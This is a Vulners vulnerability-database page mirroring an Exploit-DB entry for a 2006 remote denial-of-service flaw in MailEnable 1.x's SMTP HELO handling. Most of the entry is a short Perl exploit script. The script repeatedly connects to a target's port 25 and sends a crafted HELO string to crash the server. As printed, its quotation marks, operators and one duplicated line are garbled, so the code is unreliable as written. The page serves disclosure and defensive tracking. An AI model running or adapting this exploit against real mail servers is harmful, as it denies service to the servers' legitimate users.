Lucene search
+L

MailEnable 1.x - SMTP 'HELO' Remote Denial of Service

🗓️ 24 Jun 2006 00:00:00Reported by db0Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

MailEnable SMTP Remote Denial of Service vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
MailEnable SMTP Service HELO Command Remote DoS
25 Jun 200600:00
nessus
Tenable Nessus
MailEnable SMTP Server HELO Command Remote DoS
28 Jun 200600:00
nessus
CVE
CVE-2006-3277
28 Jun 200622:00
cve
Cvelist
CVE-2006-3277
28 Jun 200622:00
cvelist
NVD
CVE-2006-3277
28 Jun 200622:05
nvd
OpenVAS
MailEnable <= 2.0 SMTP HELO DoS Vulnerability - Active Check
12 Jul 201200:00
openvas
source: https://www.securityfocus.com/bid/18630/info

MailEnable is prone to a remote denial-of-service vulnerability.

This issue allows remote attackers to crash the application, denying further service to legitimate users.

#!/usr/bin/perl -w
#
# Mailenable SMTP DoS exploit
# 24/06/2006
#
# Filbert at divisionbyzero dot be
#

use Net::Telnet;

$string = “\0×99″;

for ($count = 1; $count < = 10; $count++)
{
$telnet = new Net::Telnet ( Timeout=>60, Errmode=>’return’,Port=>’25′);
$telnet->open($ARGV[0]);use Net::Telnet;
$telnet->print(”helo “, $string, “\n”);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Sep 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.05995
25